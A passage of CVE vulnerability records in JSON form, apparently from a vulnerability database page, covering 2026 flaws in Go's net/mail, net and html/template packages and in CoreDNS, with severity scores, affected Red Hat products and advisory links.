{
"cpes": [
"cpe:/a:redhat:logging:6.4::el9"
],
"defaultStatus": "affected",
"product": "Logging Subsystem for Red Hat OpenShift 6.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.0::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.1::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:assisted_installer:2"
],
"defaultStatus": "affected",
"product": "Assisted Installer for Red Hat OpenShift Container Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cert_manager:1"
],
"defaultStatus": "affected",
"product": "cert-manager Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:confidential_compute_attestation:1"
],
"defaultStatus": "affected",
"product": "Confidential Compute Attestation",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "affected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_custom_metrics_autoscaler:2"
],
"defaultStatus": "affected",
"product": "Custom Metric Autoscaler operator for Red Hat Openshift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:external_secrets_operator:1"
],
"defaultStatus": "affected",
"product": "External Secrets Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_file_integrity_operator:1"
],
"defaultStatus": "affected",
"product": "File Integrity Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lvms:4"
],
"defaultStatus": "affected",
"product": "Logical Volume Manager Storage",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:migration_toolkit_applications:8"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Applications 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhmt:1"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multiarch_tuning_operator"
],
"defaultStatus": "affected",
"product": "Multiarch Tuning Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:network_observ_optr:1"
],
"defaultStatus": "affected",
"product": "Network Observability Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_api_data_protection:1"
],
"defaultStatus": "affected",
"product": "OpenShift API for Data Protection",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ocp_tools"
],
"defaultStatus": "affected",
"product": "OpenShift Developer Tools and Services",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_pipelines:1"
],
"defaultStatus": "affected",
"product": "OpenShift Pipelines",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:serverless:1"
],
"defaultStatus": "affected",
"product": "OpenShift Serverless",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:2"
],
"defaultStatus": "affected",
"product": "OpenShift Service Mesh 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3"
],
"defaultStatus": "affected",
"product": "OpenShift Service Mesh 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_power_monitoring"
],
"defaultStatus": "affected",
"product": "Power monitoring for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:advanced_cluster_security:4"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Security 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:5"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:6"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:9"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:certifications:9"
],
"defaultStatus": "affected",
"product": "Red Hat Certification Program for Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "affected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_cluster_manager_cli:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Cluster Manager CLI",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_data_foundation:4"
],
"defaultStatus": "affected",
"product": "Red Hat Openshift Data Foundation 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:devworkspace"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Workspaces Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_distributed_tracing:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift distributed tracing 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:windows_machine_config"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift for Windows Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_gitops:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift GitOps",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:container_native_virtualization:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Virtualization 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:18.0"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 18.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:1"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:2"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_security_profiles_operator:1"
],
"defaultStatus": "affected",
"product": "Security Profiles Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:1"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:0"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager - Tech Preview",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:16.2"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenStack Platform 16.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:17.1"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenStack Platform 17.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:gatekeeper:3"
],
"defaultStatus": "unknown",
"product": "Gatekeeper 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_engine"
],
"defaultStatus": "unknown",
"product": "Multicluster Engine for Kubernetes",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_globalhub"
],
"defaultStatus": "unknown",
"product": "Multicluster Global Hub",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unknown",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unknown",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:edge_manager:1"
],
"defaultStatus": "unknown",
"product": "Red Hat Edge Manager 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lightspeed_for_runtimes:1"
],
"defaultStatus": "unknown",
"product": "Red Hat Lightspeed for Runtimes Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unknown",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-07T19:41:19.854Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the `net/mail` package of the Go programming language. An attacker could provide specially crafted inputs to the `ParseAddress`, `ParseAddressList`, or `ParseDate` functions. This could lead to excessive consumption of CPU and memory resources, resulting in a Denial of Service (DoS) for applications processing these inputs."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-606",
"description": "Unchecked Input for Loop Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-03T12:05:11.290Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-39820"
},
{
"name": "RHBZ#2467820",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467820"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39820.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34364"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33120"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33123"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33142"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33150"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:34364: Logging Subsystem for Red Hat OpenShift 6.4"
},
{
"lang": "en",
"value": "RHSA-2026:33574: Red Hat Developer Hub 1.9"
},
{
"lang": "en",
"value": "RHSA-2026:33120: Red Hat OpenShift Service Mesh 3.0"
},
{
"lang": "en",
"value": "RHSA-2026:33123: Red Hat OpenShift Service Mesh 3.1"
},
{
"lang": "en",
"value": "RHSA-2026:33142: Red Hat OpenShift Service Mesh 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:33150: Red Hat OpenShift Service Mesh 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-07T20:01:27.800Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-07T19:41:19.854Z",
"value": "Made public."
}
],
"title": "net/mail: golang: Go net/mail: Denial of Service via crafted email inputs",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net/mail",
"product": "net/mail",
"programRoutines": [
{
"name": "addrParser.consumeComment"
},
{
"name": "AddressParser.Parse"
},
{
"name": "AddressParser.ParseList"
},
{
"name": "Header.AddressList"
},
{
"name": "Header.Date"
},
{
"name": "ParseAddress"
},
{
"name": "ParseAddressList"
},
{
"name": "ParseDate"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "thatnealpatel"
}
],
"descriptions": [
{
"lang": "en",
"value": "Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-407: Inefficient Algorithmic Complexity",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:19.854Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78566"
},
{
"url": "https://go.dev/cl/759940"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4986"
}
],
"title": "Quadratic string concatentation in consumeComment in net/mail"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39820",
"datePublished": "2026-05-07T19:41:19.854Z",
"dateReserved": "2026-04-07T18:13:03.526Z",
"dateUpdated": "2026-07-03T12:05:11.290Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-39836 (GCVE-0-2026-39836)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 21:30- CWE-248 - Uncaught Exception
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | net |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39836",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T16:36:25.079035Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T21:30:15.127Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net",
"product": "net",
"programRoutines": [
{
"name": "Resolver.lookupPort"
},
{
"name": "Resolver.lookupAddr"
},
{
"name": "Resolver.lookupTXT"
},
{
"name": "Resolver.lookupNS"
},
{
"name": "Resolver.lookupMX"
},
{
"name": "Resolver.lookupSRV"
},
{
"name": "Dial"
},
{
"name": "DialTimeout"
},
{
"name": "Dialer.Dial"
},
{
"name": "Dialer.DialContext"
},
{
"name": "Listen"
},
{
"name": "ListenConfig.Listen"
},
{
"name": "ListenConfig.ListenPacket"
},
{
"name": "ListenPacket"
},
{
"name": "LookupAddr"
},
{
"name": "LookupCNAME"
},
{
"name": "LookupHost"
},
{
"name": "LookupIP"
},
{
"name": "LookupMX"
},
{
"name": "LookupNS"
},
{
"name": "LookupPort"
},
{
"name": "LookupSRV"
},
{
"name": "LookupTXT"
},
{
"name": "ResolveIPAddr"
},
{
"name": "ResolveTCPAddr"
},
{
"name": "ResolveUDPAddr"
},
{
"name": "Resolver.LookupAddr"
},
{
"name": "Resolver.LookupCNAME"
},
{
"name": "Resolver.LookupHost"
},
{
"name": "Resolver.LookupIP"
},
{
"name": "Resolver.LookupIPAddr"
},
{
"name": "Resolver.LookupMX"
},
{
"name": "Resolver.LookupNS"
},
{
"name": "Resolver.LookupNetIP"
},
{
"name": "Resolver.LookupPort"
},
{
"name": "Resolver.LookupSRV"
},
{
"name": "Resolver.LookupTXT"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0)."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-248: Uncaught Exception",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:18.300Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/79006"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://go.dev/cl/775320"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4971"
}
],
"title": "Panic in Dial and LookupPort when handling NUL byte on Windows in net"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39836",
"datePublished": "2026-05-07T19:41:18.300Z",
"dateReserved": "2026-04-07T18:13:03.529Z",
"dateUpdated": "2026-05-08T21:30:15.127Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-32936 (GCVE-0-2026-32936)
Vulnerability from cvelistv5 – Published: 2026-05-05 19:07 – Updated: 2026-05-05 19:32- CWE-400 - Uncontrolled Resource Consumption
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32936",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-05T19:32:21.653054Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:32:25.341Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:07:51.926Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"source": {
"advisory": "GHSA-63cw-r7xf-jmwr",
"discovery": "UNKNOWN"
},
"title": "CoreDNS DoH GET path missing size validation causes CPU and memory amplification"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32936",
"datePublished": "2026-05-05T19:07:51.926Z",
"dateReserved": "2026-03-17T00:05:53.282Z",
"dateUpdated": "2026-05-05T19:32:25.341Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-39826 (GCVE-0-2026-39826)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 14:05- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | html/template |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39826",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T14:04:40.842823Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T14:05:05.849Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "html/template",
"product": "html/template",
"programRoutines": [
{
"name": "isJSType"
},
{
"name": "Template.Execute"
},
{
"name": "Template.ExecuteTemplate"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Mundur (https://github.com/M0nd0R)"
}
],
"descriptions": [
{
"lang": "en",
"value": "If a trusted template author were to write a \u003cscript\u003e tag containing an empty \u0027type\u0027 attribute or a \u0027type\u0027 attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the \u003cscript\u003e block."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:19.138Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78981"
},
{
"url": "https://go.dev/cl/771180"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4980"
}
],
"title": "Escaper bypass leads to XSS in html/template"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39826",
"datePublished": "2026-05-07T19:41:19.138Z",
"dateReserved": "2026-04-07T18:13:03.528Z",
"dateUpdated": "2026-05-08T14:05:05.849Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33811 (GCVE-0-2026-33811)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-07-03 12:04- CWE-415 - Double Free
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | net |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-33811",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T14:25:39.702568Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T14:25:43.896Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.2"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:logging:6.4::el9"
],
"defaultStatus": "affected",
"product": "Logging Subsystem for Red Hat OpenShift 6.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "affected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.0::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.0",
"vendor": "Red Hat"
},
{
"cpes": [
